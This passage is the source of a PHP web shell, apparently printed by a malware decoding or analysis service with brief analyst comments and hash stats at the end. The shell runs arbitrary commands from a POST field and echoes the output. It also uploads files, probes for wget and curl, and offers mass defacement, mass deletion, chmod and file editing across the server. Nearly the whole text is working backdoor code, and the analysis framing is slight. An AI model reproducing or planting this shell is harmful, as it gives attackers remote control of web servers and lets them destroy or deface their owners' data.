$dir = isset($_GET["dir"]) ? $_GET["dir"] : getcwd();
?>
System:
<div id="small-solid">
<font style="color: #0CEB9A;"><?php echo php_uname(); ?></font>
</div>
Others:
<div id="small-solid">
My IP: <font style="color: #0CEB9A;"><?php echo $_SERVER["REMOTE_ADDR"]; ?></font><br>
Server IP: <font style="color: #0CEB9A;"><?php echo gethostbyname($_SERVER["HTTP_HOST"]); ?></font><br>
Free: <font style="color: #0CEB9A;"><?php echo uni_size(disk_free_space(".")); ?></font><br>
User: <font style="color: #0CEB9A;"><?php echo get_current_user(); ?></font><br>
PYTHON: <?php echo (uni_exec("python --help")) ? "<green>ON</green>":"<red>OFF</red>"?>
PERL: <?php echo (uni_exec("perl --help")) ? "<green>ON</green>":"<red>OFF</red>"?>
WGET: <?php echo (uni_exec("wget --help")) ? "<green>ON</green>":"<red>OFF</red>"?>
CURL: <?php echo (uni_exec("curl --help")) ? "<green>ON</green>":"<red>OFF</red>"?>
</div>
<div id="small-solid">
<form method="POST" action="?do=upload&dir=<?php echo $dir; ?>" enctype="multipart/form-data">
<input type="file" name="qqfile">
<input type="submit" id="button" value="upload">
</form>
</div>
Toolbox:
<div id="small-solid" style="text-align: center;">
<div id="small-dotted">
<a href="?do=mass_deface&src=<?php echo $dir; ?>">Mass Deface</a>
</div>
<div id="small-dotted">
<a href="?do=mass_delete&src=<?php echo $dir?>">Mass Delete</a>
</div>
<div id="small-dotted">
<a href="?do=writable&src=<?php echo $dir?>">Writable</a>
</div>
</div>
<table style="width: 100%;">
<tr>
<th>Name</th>
<th>Permission</th>
<th>Action</th>
</tr>
<?php
// Builds the clickable path breadcrumb from the resolved directory.
$hb = "";
$nb = "";
$hit = "";
foreach(explode("/",realpath($dir)) as $vb){
$hb .= $vb."/";
$nb = $vb;
$hit .= "<a href='?dir=$hb'>$nb/</a>";
}
echo "Path: $hit";
echo "<br>
<form method='POST' action='?do=cmd&dir=$dir'>
SukaBintang01.~$<input id='input' name='cmd' placeholder='command'>
</form>
";
// POST field "cmd" is executed via uni_exec() and its output echoed unescaped.
// Analyst notes: the logged trace is a POST to this file with do=cmd in the
// query string; the command text sits in the request body.
echo isset($_POST["cmd"]) ? uni_exec($_POST["cmd"]) : "";
if(!@scandir($dir)){
die("<red>permmission denied</red>");
}
// Directory rows first ("." and ".." get create links, other directories get
// rename/delete/chmod/info links).
foreach( scandir($dir) as $item){
$perm = uni_perm($dir."/".$item);
if($item == "." OR $item == ".."){
$ite = "<a href='?dir=$dir/$item'>$item</a>";
echo "
<tr>
<th><img src='$folder'>$ite</th>
<th>$perm[0] - $perm[1] - $perm[2]</th>
<th>
<a href='?do=newfile&src=$dir/$item&dir=$dir'>New File</a>
<a href='?do=mkdir&src=$dir/$item&dir=$dir'>New Folder</a>
</th>
</tr>
";
continue;
}
if(is_dir($dir."/".$item)){
$ite = "<a href='?dir=$dir/$item'>$item</a>";
echo "
<tr>
<th><img src='$folder'>$ite</th>
<th>$perm[0] - $perm[1] - $perm[2]</th>
<th>
<a href='?do=rename&src=$dir/$item&dir=$dir'>Rename</a>
<a href='?do=rmdir&src=$dir/$item&dir=$dir'>Delete</a>
<a href='?do=chmod&src=$dir/$item&dir=$dir'>Chmod</a>
<a href='?do=properties&src=$dir/$item&dir=$dir'>Info</a>
</th>
</tr>
";
}
}
// File rows second, each linking to the edit action and the per-file actions.
foreach( scandir($dir) as $item){
$perm = uni_perm($dir."/".$item);
if(is_file($dir."/".$item)){
$ite = "<a href='?do=edit&src=$dir/$item'>$item</a>";
echo "
<tr>
<th><img src='$file'>$ite</th>
<th>$perm[0] - $perm[1] - $perm[2]</th>
<th>
<a href='?do=rename&src=$dir/$item&dir=$dir'>Rename</a>
<a href='?do=unlink&src=$dir/$item&dir=$dir'>Delete</a>
<a href='?do=chmod&src=$dir/$item&dir=$dir'>Chmod</a>
<a href='?do=copy&src=$dir/$item&dir=$dir'>Copy</a>
<a href='?do=properties&src=$dir/$item&dir=$dir'>Info</a>
</th>
</tr>
";
}
}
?>
</table>
<?php
endif;
?>
</body>
Function Calls
None |
Stats
MD5 | a5688cad094215a2b5060907d8de3219 |
Eval Count | 0 |
Decode Time | 64 ms |